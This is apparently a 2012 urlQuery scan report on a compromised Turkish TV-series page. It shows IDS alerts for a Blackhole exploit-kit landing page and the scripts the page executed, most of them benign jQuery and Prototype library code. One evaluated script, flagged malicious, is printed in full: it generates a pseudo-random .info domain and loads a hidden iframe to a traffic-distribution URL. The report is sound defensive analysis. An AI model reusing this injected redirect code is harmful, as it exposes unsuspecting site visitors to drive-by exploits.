Overview

URLhttp://osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
IP85.17.175.201
ASNAS16265 LeaseWeb B.V.
Location Netherlands
Report completed2012-11-14 14:33:03 CET
StatusLoading report..
urlQuery Alerts Detected script marked as malicious
Detected SutraTDS URL pattern
Detected a TDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-14 14:32:30 85.17.175.201 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 85.17.175.201

Date Alerts / IDS URL IP
2013-04-09 18:28:420 / 1http://www.ozelatlantiscocukevi.com/ilqja/mjb.gfy?ktz85.17.175.201
2012-12-11 00:12:252 / 1http://www.osmanoguz.net/category/biyografi85.17.175.201
2012-12-11 00:10:232 / 1http://www.osmanoguz.net/category/fragmanlar85.17.175.201
2012-12-11 00:03:082 / 1http://www.osmanoguz.net/category/galatasaray85.17.175.201
2012-12-10 23:32:562 / 1http://www.osmanoguz.net/category/diziler85.17.175.201
2012-12-10 19:50:352 / 1http://www.osmanoguz.net/ay-lav-yu-full-izle.html85.17.175.201

Last 6 reports on ASN: AS16265 LeaseWeb B.V.

Date Alerts / IDS URL IP
2013-04-11 10:21:520 / 1http://potload.com/7552onawkk4s95.211.225.227
2013-04-11 10:19:270 / 0http://lnx.lu85.17.224.117
2013-04-11 09:59:320 / 1http://euro-hubner.net/js/sub_header.js85.234.225.194
2013-04-11 09:56:030 / 2http://downloadsave.info/?e=smc46.165.211.181
2013-04-11 09:42:040 / 1http://www.easyhookupmatch.com/SLAGSDESK/index.php77.235.62.63
2013-04-11 09:40:040 / 1http://potload.com/yajx5ijev3s695.211.225.227



JavaScript

Executed Scripts (22)


Executed Evals (4)

#1 JavaScript::Eval (size: 2383, repeated: 1)

(function($) {
    $.fn.jCarouselLite = function(o) {
        o = $.extend({
            btnPrev: null,
            btnNext: null,
            btnGo: null,
            mouseWheel: false,
            auto: null,
            speed: 200,
            easing: null,
            vertical: false,
            circular: true,
            visible: 3,
            start: 0,
            scroll: 1,
            beforeStart: null,
            afterEnd: null
        }, o || {});
        return this.each(function() {
            var b = false,
                animCss = o.vertical ? "top" : "left",
                sizeCss = o.vertical ? "height" : "width";
            var c = $(this),
                ul = $("ul", c),
                tLi = $("li", ul),
                tl = tLi.size(),
                v = o.visible;
            if (o.circular) {
                ul.prepend(tLi.slice(tl - v - 1 + 1).clone()).append(tLi.slice(0, v).clone());
                o.start += v
            }
            var f = $("li", ul),
                itemLength = f.size(),
                curr = o.start;
            c.css("visibility", "visible");
            f.css({
                overflow: "hidden",
                float: o.vertical ? "none" : "left"
            });
            ul.css({
                margin: "0",
                padding: "0",
                position: "relative",
                "list-style-type": "none",
                "z-index": "1"
            });
            c.css({
                overflow: "hidden",
                position: "relative",
                "z-index": "2",
                left: "0px"
            });
            var g = o.vertical ? height(f) : width(f);
            var h = g * itemLength;
            var j = g * v;
            f.css({
                width: f.width(),
                height: f.height()
            });
            ul.css(sizeCss, h + "px").css(animCss, -(curr * g));
            c.css(sizeCss, j + "px");
            if (o.btnPrev) $(o.btnPrev).click(function() {
                return go(curr - o.scroll)
            });
            if (o.btnNext) $(o.btnNext).click(function() {
                return go(curr + o.scroll)
            });
            if (o.btnGo) $.each(o.btnGo, function(i, a) {
                $(a).click(function() {
                    return go(o.circular ? o.visible + i : i)
                })
            });
            if (o.mouseWheel && c.mousewheel) c.mousewheel(function(e, d) {
                return d > 0 ? go(curr - o.scroll) : go(curr + o.scroll)
            });
            if (o.auto) setInterval(function() {
                go(curr + o.scroll)
            }, o.auto + o.speed);

            function vis() {
                return f.slice(curr).slice(0, v)
            };

            function go(a) {
                if (!b) {
                    if (o.beforeStart) o.beforeStart.call(this, vis());
                    if (o.circular) {
                        if (a <= o.start - v - 1) {
                            ul.css(animCss, -((itemLength - (v * 2)) * g) + "px");
                            curr = a == o.start - v - 1 ? itemLength - (v * 2) - 1 : itemLength - (v * 2) - o.scroll
                        } else if (a >= itemLength - v + 1) {
                            ul.css(animCss, -((v) * g) + "px");
                            curr = a == itemLength - v + 1 ? v + 1 : v + o.scroll
                        } else curr = a
                    } else {
                        if (a < 0 || a > itemLength - v) return;
                        else curr = a
                    }
                    b = true;
                    ul.animate(animCss == "left" ? {
                        left: -(curr * g)
                    } : {
                        top: -(curr * g)
                    }, o.speed, o.easing, function() {
                        if (o.afterEnd) o.afterEnd.call(this, vis());
                        b = false
                    });
                    if (!o.circular) {
                        $(o.btnPrev + "," + o.btnNext).removeClass("disabled");
                        $((curr - o.scroll < 0 && o.btnPrev) || (curr + o.scroll > itemLength - v && o.btnNext) || []).addClass("disabled")
                    }
                }
                return false
            }
        })
    };

    function css(a, b) {
        return parseInt($.css(a[0], b)) || 0
    };

    function width(a) {
        return a[0].offsetWidth + css(a, 'marginLeft') + css(a, 'marginRight')
    };

    function height(a) {
        return a[0].offsetHeight + css(a, 'marginTop') + css(a, 'marginBottom')
    }
})(jQuery);

#2 JavaScript::Eval (size: 1773, repeated: 1) - Script marked as malicious

function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = "qmahgwctopfjilrfpjrfcwgewheizwdw".split('');
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function() {
    try {
        if (typeof iframeWasCreated == "undefined") {
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'info');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?14");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
            iframeWasCreated = true;
        }
    } catch (e) {
        iframeWasCreated = undefined;
    }
}, 100);

#3 JavaScript::Eval (size: 28397, repeated: 1)

var Prototype = {
    Version: '1.4.0',
    ScriptFragment: '(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)',
    emptyFunction: function() {},
    K: function(a) {
        return a
    }
};
var Class = {
    create: function() {
        return function() {
            this.initialize.apply(this, arguments)
        }
    }
};
var Abstract = new Object();
Object.extend = function(a, b) {
    for (property in b) {
        a[property] = b[property]
    }
    return a
};
Object.inspect = function(a) {
    try {
        if (a == undefined) return 'undefined';
        if (a == null) return 'null';
        return a.inspect ? a.inspect() : a.toString()
    } catch (e) {
        if (e instanceof RangeError) return '...';
        throw e;
    }
};
Function.prototype.bind = function() {
    var a = this,
        args = $A(arguments),
        object = args.shift();
    return function() {
        return a.apply(object, args.concat($A(arguments)))
    }
};
Function.prototype.bindAsEventListener = function(b) {
    var c = this;
    return function(a) {
        return c.call(b, a || window.event)
    }
};
Object.extend(Number.prototype, {
    toColorPart: function() {
        var a = this.toString(16);
        if (this < 16) return '0' + a;
        return a
    },
    succ: function() {
        return this + 1
    },
    times: function(a) {
        $R(0, this, true).each(a);
        return this
    }
});
var Try = {
    these: function() {
        var a;
        for (var i = 0; i < arguments.length; i++) {
            var b = arguments[i];
            try {
                a = b();
                break
            } catch (e) {}
        }
        return a
    }
};
var PeriodicalExecuter = Class.create();
PeriodicalExecuter.prototype = {
    initialize: function(a, b) {
        this.callback = a;
        this.frequency = b;
        this.currentlyExecuting = false;
        this.registerCallback()
    },
    registerCallback: function() {
        setInterval(this.onTimerEvent.bind(this), this.frequency * 1000)
    },
    onTimerEvent: function() {
        if (!this.currentlyExecuting) {
            try {
                this.currentlyExecuting = true;
                this.callback()
            } finally {
                this.currentlyExecuting = false
            }
        }
    }
};

function $() {
    var a = new Array();
    for (var i = 0; i < arguments.length; i++) {
        var b = arguments[i];
        if (typeof b == 'string') b = document.getElementById(b);
        if (arguments.length == 1) return b;
        a.push(b)
    }
    return a
}
Object.extend(String.prototype, {
    stripTags: function() {
        return this.replace(/<\/?[^>]+>/gi, '')
    },
    stripScripts: function() {
        return this.replace(new RegExp(Prototype.ScriptFragment, 'img'), '')
    },
    extractScripts: function() {
        var b = new RegExp(Prototype.ScriptFragment, 'img');
        var c = new RegExp(Prototype.ScriptFragment, 'im');
        return (this.match(b) || []).map(function(a) {
            return (a.match(c) || ['', ''])[1]
        })
    },
    evalScripts: function() {
        return this.extractScripts().map(eval)
    },
    escapeHTML: function() {
        var a = document.createElement('div');
        var b = document.createTextNode(this);
        a.appendChild(b);
        return a.innerHTML
    },
    unescapeHTML: function() {
        var a = document.createElement('div');
        a.innerHTML = this.stripTags();
        return a.childNodes[0] ? a.childNodes[0].nodeValue : ''
    },
    toQueryParams: function() {
        var d = this.match(/^\??(.*)$/)[1].split('&');
        return d.inject({}, function(a, b) {
            var c = b.split('=');
            a[c[0]] = c[1];
            return a
        })
    },
    toArray: function() {
        return this.split('')
    },
    camelize: function() {
        var a = this.split('-');
        if (a.length == 1) return a[0];
        var b = this.indexOf('-') == 0 ? a[0].charAt(0).toUpperCase() + a[0].substring(1) : a[0];
        for (var i = 1, len = a.length; i < len; i++) {
            var s = a[i];
            b += s.charAt(0).toUpperCase() + s.substring(1)
        }
        return b
    },
    inspect: function() {
        return "'" + this.replace('\\', '\\\\').replace("'", '\\\'') + "'"
    }
});
String.prototype.parseQuery = String.prototype.toQueryParams;
var $break = new Object();
var $continue = new Object();
var Enumerable = {
    each: function(b) {
        var c = 0;
        try {
            this._each(function(a) {
                try {
                    b(a, c++)
                } catch (e) {
                    if (e != $continue) throw e;
                }
            })
        } catch (e) {
            if (e != $break) throw e;
        }
    },
    all: function(c) {
        var d = true;
        this.each(function(a, b) {
            d = d && !! (c || Prototype.K)(a, b);
            if (!d) throw $break;
        });
        return d
    },
    any: function(c) {
        var d = true;
        this.each(function(a, b) {
            if (d = !! (c || Prototype.K)(a, b)) throw $break;
        });
        return d
    },
    collect: function(c) {
        var d = [];
        this.each(function(a, b) {
            d.push(c(a, b))
        });
        return d
    },
    detect: function(c) {
        var d;
        this.each(function(a, b) {
            if (c(a, b)) {
                d = a;
                throw $break;
            }
        });
        return d
    },
    findAll: function(c) {
        var d = [];
        this.each(function(a, b) {
            if (c(a, b)) d.push(a)
        });
        return d
    },
    grep: function(d, e) {
        var f = [];
        this.each(function(a, b) {
            var c = a.toString();
            if (c.match(d)) f.push((e || Prototype.K)(a, b))
        });
        return f
    },
    include: function(b) {
        var c = false;
        this.each(function(a) {
            if (a == b) {
                c = true;
                throw $break;
            }
        });
        return c
    },
    inject: function(c, d) {
        this.each(function(a, b) {
            c = d(c, a, b)
        });
        return c
    },
    invoke: function(b) {
        var c = $A(arguments).slice(1);
        return this.collect(function(a) {
            return a[b].apply(a, c)
        })
    },
    max: function(c) {
        var d;
        this.each(function(a, b) {
            a = (c || Prototype.K)(a, b);
            if (a >= (d || a)) d = a
        });
        return d
    },
    min: function(c) {
        var d;
        this.each(function(a, b) {
            a = (c || Prototype.K)(a, b);
            if (a <= (d || a)) d = a
        });
        return d
    },
    partition: function(c) {
        var d = [],
            falses = [];
        this.each(function(a, b) {
            ((c || Prototype.K)(a, b) ? d : falses).push(a)
        });
        return [d, falses]
    },
    pluck: function(c) {
        var d = [];
        this.each(function(a, b) {
            d.push(a[c])
        });
        return d
    },
    reject: function(c) {
        var d = [];
        this.each(function(a, b) {
            if (!c(a, b)) d.push(a)
        });
        return d
    },
    sortBy: function(e) {
        return this.collect(function(a, b) {
            return {
                value: a,
                criteria: e(a, b)
            }
        }).sort(function(c, d) {
            var a = c.criteria,
                b = d.criteria;
            return a < b ? -1 : a > b ? 1 : 0
        }).pluck('value')
    },
    toArray: function() {
        return this.collect(Prototype.K)
    },
    zip: function() {
        var c = Prototype.K,
            args = $A(arguments);
        if (typeof args.last() == 'function') c = args.pop();
        var d = [this].concat(args).map($A);
        return this.map(function(a, b) {
            c(a = d.pluck(b));
            return a
        })
    },
    inspect: function() {
        return '#<Enumerable:' + this.toArray().inspect() + '>'
    }
};
Object.extend(Enumerable, {
    map: Enumerable.collect,
    find: Enumerable.detect,
    select: Enumerable.findAll,
    member: Enumerable.include,
    entries: Enumerable.toArray
});
var $A = Array.from = function(a) {
        if (!a) return [];
        if (a.toArray) {
            return a.toArray()
        } else {
            var b = [];
            for (var i = 0; i < a.length; i++) b.push(a[i]);
            return b
        }
    };
Object.extend(Array.prototype, Enumerable);
Array.prototype._reverse = Array.prototype.reverse;
Object.extend(Array.prototype, {
    _each: function(a) {
        for (var i = 0; i < this.length; i++) a(this[i])
    },
    clear: function() {
        this.length = 0;
        return this
    },
    first: function() {
        return this[0]
    },
    last: function() {
        return this[this.length - 1]
    },
    compact: function() {
        return this.select(function(a) {
            return a != undefined || a != null
        })
    },
    flatten: function() {
        return this.inject([], function(a, b) {
            return a.concat(b.constructor == Array ? b.flatten() : [b])
        })
    },
    without: function() {
        var b = $A(arguments);
        return this.select(function(a) {
            return !b.include(a)
        })
    },
    indexOf: function(a) {
        for (var i = 0; i < this.length; i++) if (this[i] == a) return i;
        return -1
    },
    reverse: function(a) {
        return (a !== false ? this : this.toArray())._reverse()
    },
    shift: function() {
        var a = this[0];
        for (var i = 0; i < this.length - 1; i++) this[i] = this[i + 1];
        this.length--;
        return a
    },
    inspect: function() {
        return '[' + this.map(Object.inspect).join(', ') + ']'
    }
});
var Hash = {
    _each: function(a) {
        for (key in this) {
            var b = this[key];
            if (typeof b == 'function') continue;
            var c = [key, b];
            c.key = key;
            c.value = b;
            a(c)
        }
    },
    keys: function() {
        return this.pluck('key')
    },
    values: function() {
        return this.pluck('value')
    },
    merge: function(c) {
        return $H(c).inject($H(this), function(a, b) {
            a[b.key] = b.value;
            return a
        })
    },
    toQueryString: function() {
        return this.map(function(a) {
            return a.map(encodeURIComponent).join('=')
        }).join('&')
    },
    inspect: function() {
        return '#<Hash:{' + this.map(function(a) {
            return a.map(Object.inspect).join(': ')
        }).join(', ') + '}>'
    }
};

function $H(a) {
    var b = Object.extend({}, a || {});
    Object.extend(b, Enumerable);
    Object.extend(b, Hash);
    return b
}
ObjectRange = Class.create();
Object.extend(ObjectRange.prototype, Enumerable);
Object.extend(ObjectRange.prototype, {
    initialize: function(a, b, c) {
        this.start = a;
        this.end = b;
        this.exclusive = c
    },
    _each: function(a) {
        var b = this.start;
        do {
            a(b);
            b = b.succ()
        } while (this.include(b))
    },
    include: function(a) {
        if (a < this.start) return false;
        if (this.exclusive) return a < this.end;
        return a <= this.end
    }
});
var $R = function(a, b, c) {
        return new ObjectRange(a, b, c)
    };
var Ajax = {
    getTransport: function() {
        return Try.these(function() {
            return new ActiveXObject('Msxml2.XMLHTTP')
        }, function() {
            return new ActiveXObject('Microsoft.XMLHTTP')
        }, function() {
            return new XMLHttpRequest()
        }) || false
    },
    activeRequestCount: 0
};
Ajax.Responders = {
    responders: [],
    _each: function(a) {
        this.responders._each(a)
    },
    register: function(a) {
        if (!this.include(a)) this.responders.push(a)
    },
    unregister: function(a) {
        this.responders = this.responders.without(a)
    },
    dispatch: function(b, c, d, f) {
        this.each(function(a) {
            if (a[b] && typeof a[b] == 'function') {
                try {
                    a[b].apply(a, [c, d, f])
                } catch (e) {}
            }
        })
    }
};
Object.extend(Ajax.Responders, Enumerable);
Ajax.Responders.register({
    onCreate: function() {
        Ajax.activeRequestCount++
    },
    onComplete: function() {
        Ajax.activeRequestCount--
    }
});
Ajax.Base = function() {};
Ajax.Base.prototype = {
    setOptions: function(a) {
        this.options = {
            method: 'post',
            asynchronous: true,
            parameters: ''
        };
        Object.extend(this.options, a || {})
    },
    responseIsSuccess: function() {
        return this.transport.status == undefined || this.transport.status == 0 || (this.transport.status >= 200 && this.transport.status < 300)
    },
    responseIsFailure: function() {
        return !this.responseIsSuccess()
    }
};
Ajax.Request = Class.create();
Ajax.Request.Events = ['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];
Ajax.Request.prototype = Object.extend(new Ajax.Base(), {
    initialize: function(a, b) {
        this.transport = Ajax.getTransport();
        this.setOptions(b);
        this.request(a)
    },
    request: function(a) {
        var b = this.options.parameters || '';
        if (b.length > 0) b += '&_=';
        try {
            this.url = a;
            if (this.options.method == 'get' && b.length > 0) this.url += (this.url.match(/\?/) ? '&' : '?') + b;
            Ajax.Responders.dispatch('onCreate', this, this.transport);
            this.transport.open(this.options.method, this.url, this.options.asynchronous);
            if (this.options.asynchronous) {
                this.transport.onreadystatechange = this.onStateChange.bind(this);
                setTimeout((function() {
                    this.respondToReadyState(1)
                }).bind(this), 10)
            }
            this.setRequestHeaders();
            var c = this.options.postBody ? this.options.postBody : b;
            this.transport.send(this.options.method == 'post' ? c : null)
        } catch (e) {
            this.dispatchException(e)
        }
    },
    setRequestHeaders: function() {
        var a = ['X-Requested-With', 'XMLHttpRequest', 'X-Prototype-Version', Prototype.Version];
        if (this.options.method == 'post') {
            a.push('Content-type', 'application/x-www-form-urlencoded');
            if (this.transport.overrideMimeType) a.push('Connection', 'close')
        }
        if (this.options.requestHeaders) a.push.apply(a, this.options.requestHeaders);
        for (var i = 0; i < a.length; i += 2) this.transport.setRequestHeader(a[i], a[i + 1])
    },
    onStateChange: function() {
        var a = this.transport.readyState;
        if (a != 1) this.respondToReadyState(this.transport.readyState)
    },
    header: function(a) {
        try {
            return this.transport.getResponseHeader(a)
        } catch (e) {}
    },
    evalJSON: function() {
        try {
            return eval(this.header('X-JSON'))
        } catch (e) {}
    },
    evalResponse: function() {
        try {
            return eval(this.transport.responseText)
        } catch (e) {
            this.dispatchException(e)
        }
    },
    respondToReadyState: function(a) {
        var b = Ajax.Request.Events[a];
        var c = this.transport,
            json = this.evalJSON();
        if (b == 'Complete') {
            try {
                (this.options['on' + this.transport.status] || this.options['on' + (this.responseIsSuccess() ? 'Success' : 'Failure')] || Prototype.emptyFunction)(c, json)
            } catch (e) {
                this.dispatchException(e)
            }
            if ((this.header('Content-type') || '').match(/^text\/javascript/i)) this.evalResponse()
        }
        try {
            (this.options['on' + b] || Prototype.emptyFunction)(c, json);
            Ajax.Responders.dispatch('on' + b, this, c, json)
        } catch (e) {
            this.dispatchException(e)
        }
        if (b == 'Complete') this.transport.onreadystatechange = Prototype.emptyFunction
    },
    dispatchException: function(a) {
        (this.options.onException || Prototype.emptyFunction)(this, a);
        Ajax.Responders.dispatch('onException', this, a)
    }
});
Ajax.Updater = Class.create();
Object.extend(Object.extend(Ajax.Updater.prototype, Ajax.Request.prototype), {
    initialize: function(c, d, e) {
        this.containers = {
            success: c.success ? $(c.success) : $(c),
            failure: c.failure ? $(c.failure) : (c.success ? null : $(c))
        };
        this.transport = Ajax.getTransport();
        this.setOptions(e);
        var f = this.options.onComplete || Prototype.emptyFunction;
        this.options.onComplete = (function(a, b) {
            this.updateContent();
            f(a, b)
        }).bind(this);
        this.request(d)
    },
    updateContent: function() {
        var a = this.responseIsSuccess() ? this.containers.success : this.containers.failure;
        var b = this.transport.responseText;
        if (!this.options.evalScripts) b = b.stripScripts();
        if (a) {
            if (this.options.insertion) {
                new this.options.insertion(a, b)
            } else {
                Element.update(a, b)
            }
        }
        if (this.responseIsSuccess()) {
            if (this.onComplete) setTimeout(this.onComplete.bind(this), 10)
        }
    }
});
Ajax.PeriodicalUpdater = Class.create();
Ajax.PeriodicalUpdater.prototype = Object.extend(new Ajax.Base(), {
    initialize: function(a, b, c) {
        this.setOptions(c);
        this.onComplete = this.options.onComplete;
        this.frequency = (this.options.frequency || 2);
        this.decay = (this.options.decay || 1);
        this.updater = {};
        this.container = a;
        this.url = b;
        this.start()
    },
    start: function() {
        this.options.onComplete = this.updateComplete.bind(this);
        this.onTimerEvent()
    },
    stop: function() {
        this.updater.onComplete = undefined;
        clearTimeout(this.timer);
        (this.onComplete || Prototype.emptyFunction).apply(this, arguments)
    },
    updateComplete: function(a) {
        if (this.options.decay) {
            this.decay = (a.responseText == this.lastText ? this.decay * this.options.decay : 1);
            this.lastText = a.responseText
        }
        this.timer = setTimeout(this.onTimerEvent.bind(this), this.decay * this.frequency * 1000)
    },
    onTimerEvent: function() {
        this.updater = new Ajax.Updater(this.container, this.url, this.options)
    }
});
document.getElementsByClassName = function(c, d) {
    var e = ($(d) || document.body).getElementsByTagName('*');
    return $A(e).inject([], function(a, b) {
        if (b.className.match(new RegExp("(^|\\s)" + c + "(\\s|$)"))) a.push(b);
        return a
    })
};
if (!window.Element) {
    var Element = new Object()
}
Object.extend(Element, {
    visible: function(a) {
        return $(a).style.display != 'none'
    },
    toggle: function() {
        for (var i = 0; i < arguments.length; i++) {
            var a = $(arguments[i]);
            Element[Element.visible(a) ? 'hide' : 'show'](a)
        }
    },
    hide: function() {
        for (var i = 0; i < arguments.length; i++) {
            var a = $(arguments[i]);
            a.style.display = 'none'
        }
    },
    show: function() {
        for (var i = 0; i < arguments.length; i++) {
            var a = $(arguments[i]);
            a.style.display = ''
        }
    },
    remove: function(a) {
        a = $(a);
        a.parentNode.removeChild(a)
    },
    update: function(a, b) {
        $(a).innerHTML = b.stripScripts();
        setTimeout(function() {
            b.evalScripts()
        }, 10)
    },
    getHeight: function(a) {
        a = $(a);
        return a.offsetHeight
    },
    classNames: function(a) {
        return new Element.ClassNames(a)
    },
    hasClassName: function(a, b) {
        if (!(a = $(a))) return;
        return Element.classNames(a).include(b)
    },
    addClassName: function(a, b) {
        if (!(a = $(a))) return;
        return Element.classNames(a).add(b)
    },
    removeClassName: function(a, b) {
        if (!(a = $(a))) return;
        return Element.classNames(a).remove(b)
    },
    cleanWhitespace: function(a) {
        a = $(a);
        for (var i = 0; i < a.childNodes.length; i++) {
            var b = a.childNodes[i];
            if (b.nodeType == 3 && !/\S/.test(b.nodeValue)) Element.remove(b)
        }
    },
    empty: function(a) {
        return $(a).innerHTML.match(/^\s*$/)
    },
    scrollTo: function(a) {
        a = $(a);
        var x = a.x ? a.x : a.offsetLeft,
            y = a.y ? a.y : a.offsetTop;
        window.scrollTo(x, y)
    },
    getStyle: function(a, b) {
        a = $(a);
        var c = a.style[b.camelize()];
        if (!c) {
            if (document.defaultView && document.defaultView.getComputedStyle) {
                var d = document.defaultView.getComputedStyle(a, null);
                c = d ? d.getPropertyValue(b) : null
            } else if (a.currentStyle) {
                c = a.currentStyle[b.camelize()]
            }
        }
        if (window.opera && ['left', 'top', 'right', 'bottom'].include(b)) if (Element.getStyle(a, 'position') == 'static') c = 'auto';
        return c == 'auto' ? null : c
    },
    setStyle: function(a, b) {
        a = $(a);
        for (name in b) a.style[name.camelize()] = b[name]
    },
    getDimensions: function(a) {
        a = $(a);
        if (Element.getStyle(a, 'display') != 'none') return {
            width: a.offsetWidth,
            height: a.offsetHeight
        };
        var b = a.style;
        var c = b.visibility;
        var d = b.position;
        b.visibility = 'hidden';
        b.position = 'absolute';
        b.display = '';
        var e = a.clientWidth;
        var f = a.clientHeight;
        b.display = 'none';
        b.position = d;
        b.visibility = c;
        return {
            width: e,
            height: f
        }
    },
    makePositioned: function(a) {
        a = $(a);
        var b = Element.getStyle(a, 'position');
        if (b == 'static' || !b) {
            a._madePositioned = true;
            a.style.position = 'relative';
            if (window.opera) {
                a.style.top = 0;
                a.style.left = 0
            }
        }
    },
    undoPositioned: function(a) {
        a = $(a);
        if (a._madePositioned) {
            a._madePositioned = undefined;
            a.style.position = a.style.top = a.style.left = a.style.bottom = a.style.right = ''
        }
    },
    makeClipping: function(a) {
        a = $(a);
        if (a._overflow) return;
        a._overflow = a.style.overflow;
        if ((Element.getStyle(a, 'overflow') || 'visible') != 'hidden') a.style.overflow = 'hidden'
    },
    undoClipping: function(a) {
        a = $(a);
        if (a._overflow) return;
        a.style.overflow = a._overflow;
        a._overflow = undefined
    }
});
var Toggle = new Object();
Toggle.display = Element.toggle;
Abstract.Insertion = function(a) {
    this.adjacency = a
};
Abstract.Insertion.prototype = {
    initialize: function(a, b) {
        this.element = $(a);
        this.content = b.stripScripts();
        if (this.adjacency && this.element.insertAdjacentHTML) {
            try {
                this.element.insertAdjacentHTML(this.adjacency, this.content)
            } catch (e) {
                if (this.element.tagName.toLowerCase() == 'tbody') {
                    this.insertContent(this.contentFromAnonymousTable())
                } else {
                    throw e;
                }
            }
        } else {
            this.range = this.element.ownerDocument.createRange();
            if (this.initializeRange) this.initializeRange();
            this.insertContent([this.range.createContextualFragment(this.content)])
        }
        setTimeout(function() {
            b.evalScripts()
        }, 10)
    },
    contentFromAnonymousTable: function() {
        var a = document.createElement('div');
        a.innerHTML = '<table><tbody>' + this.content + '</tbody></table>';
        return $A(a.childNodes[0].childNodes[0].childNodes)
    }
};
var Insertion = new Object();
Insertion.Before = Class.create();
Insertion.Before.prototype = Object.extend(new Abstract.Insertion('beforeBegin'), {
    initializeRange: function() {
        this.range.setStartBefore(this.element)
    },
    insertContent: function(b) {
        b.each((function(a) {
            this.element.parentNode.insertBefore(a, this.element)
        }).bind(this))
    }
});
Insertion.Top = Class.create();
Insertion.Top.prototype = Object.extend(new Abstract.Insertion('afterBegin'), {
    initializeRange: function() {
        this.range.selectNodeContents(this.element);
        this.range.collapse(true)
    },
    insertContent: function(b) {
        b.reverse(false).each((function(a) {
            this.element.insertBefore(a, this.element.firstChild)
        }).bind(this))
    }
});
Insertion.Bottom = Class.create();
Insertion.Bottom.prototype = Object.extend(new Abstract.Insertion('beforeEnd'), {
    initializeRange: function() {
        this.range.selectNodeContents(this.element);
        this.range.collapse(this.element)
    },
    insertContent: function(b) {
        b.each((function(a) {
            this.element.appendChild(a)
        }).bind(this))
    }
});
Insertion.After = Class.create();
Insertion.After.prototype = Object.extend(new Abstract.Insertion('afterEnd'), {
    initializeRange: function() {
        this.range.setStartAfter(this.element)
    },
    insertContent: function(b) {
        b.each((function(a) {
            this.element.parentNode.insertBefore(a, this.element.nextSibling)
        }).bind(this))
    }
});
Element.ClassNames = Class.create();
Element.ClassNames.prototype = {
    initialize: function(a) {
        this.element = $(a)
    },
    _each: function(b) {
        this.element.className.split(/\s+/).select(function(a) {
            return a.length > 0
        })._each(b)
    },
    set: function(a) {
        this.element.className = a
    },
    add: function(a) {
        if (this.include(a)) return;
        this.set(this.toArray().concat(a).join(' '))
    },
    remove: function(b) {
        if (!this.include(b)) return;
        this.set(this.select(function(a) {
            return a != b
        }).join(' '))
    },
    toString: function() {
        return this.toArray().join(' ')
    }
};
Object.extend(Element.ClassNames.prototype, Enumerable);
var Field = {
    clear: function() {
        for (var i = 0; i < arguments.length; i++) $(arguments[i]).value = ''
    },
    focus: function(a) {
        $(a).focus()
    },
    present: function() {
        for (var i = 0; i < arguments.length; i++) if ($(arguments[i]).value == '') return false;
        return true
    },
    select: function(a) {
        $(a).select()
    },
    activate: function(a) {
        a = $(a);
        a.focus();
        if (a.select) a.select()
    }
};
var Form = {
    serialize: function(a) {
        var b = Form.getElements($(a));
        var c = new Array();
        for (var i = 0; i < b.length; i++) {
            var d = Form.Element.serialize(b[i]);
            if (d) c.push(d)
        }
        return c.join('&')
    },
    getElements: function(a) {
        a = $(a);
        var b = new Array();
        for (tagName in Form.Element.Serializers) {
            var c = a.getElementsByTagName(tagName);
            for (var j = 0; j < c.length; j++) b.push(c[j])
        }
        return b
    },
    getInputs: function(a, b, c) {
        a = $(a);
        var d = a.getElementsByTagName('input');
        if (!b && !c) return d;
        var e = new Array();
        for (var i = 0; i < d.length; i++) {
            var f = d[i];
            if ((b && f.type != b) || (c && f.name != c)) continue;
            e.push(f)
        }
        return e
    },
    disable: function(a) {
        var b = Form.getElements(a);
        for (var i = 0; i < b.length; i++) {
            var c = b[i];
            c.blur();
            c.disabled = 'true'
        }
    },
    enable: function(a) {
        var b = Form.getElements(a);
        for (var i = 0; i < b.length; i++) {
            var c = b[i];
            c.disabled = ''
        }
    },
    findFirstElement: function(b) {
        return Form.getElements(b).find(function(a) {
            return a.type != 'hidden' && !a.disabled && ['input', 'select', 'textarea'].include(a.tagName.toLowerCase())
        })
    },
    focusFirstElement: function(a) {
        Field.activate(Form.findFirstElement(a))
    },
    reset: function(a) {
        $(a).reset()
    }
};
Form.Element = {
    serialize: function(b) {
        b = $(b);
        var c = b.tagName.toLowerCase();
        var d = Form.Element.Serializers[c](b);
        if (d) {
            var e = encodeURIComponent(d[0]);
            if (e.length == 0) return;
            if (d[1].constructor != Array) d[1] = [d[1]];
            return d[1].map(function(a) {
                return e + '=' + encodeURIComponent(a)
            }).join('&')
        }
    },
    getValue: function(a) {
        a = $(a);
        var b = a.tagName.toLowerCase();
        var c = Form.Element.Serializers[b](a);
        if (c) return c[1]
    }
};
Form.Element.Serializers = {
    input: function(a) {
        switch (a.type.toLowerCase()) {
        case 'submit':
        case 'hidden':
        case 'password':
        case 'text':
            return Form.Element.Serializers.textarea(a);
        case 'checkbox':
        case 'radio':
            return Form.Element.Serializers.inputSelector(a)
        }
        return false
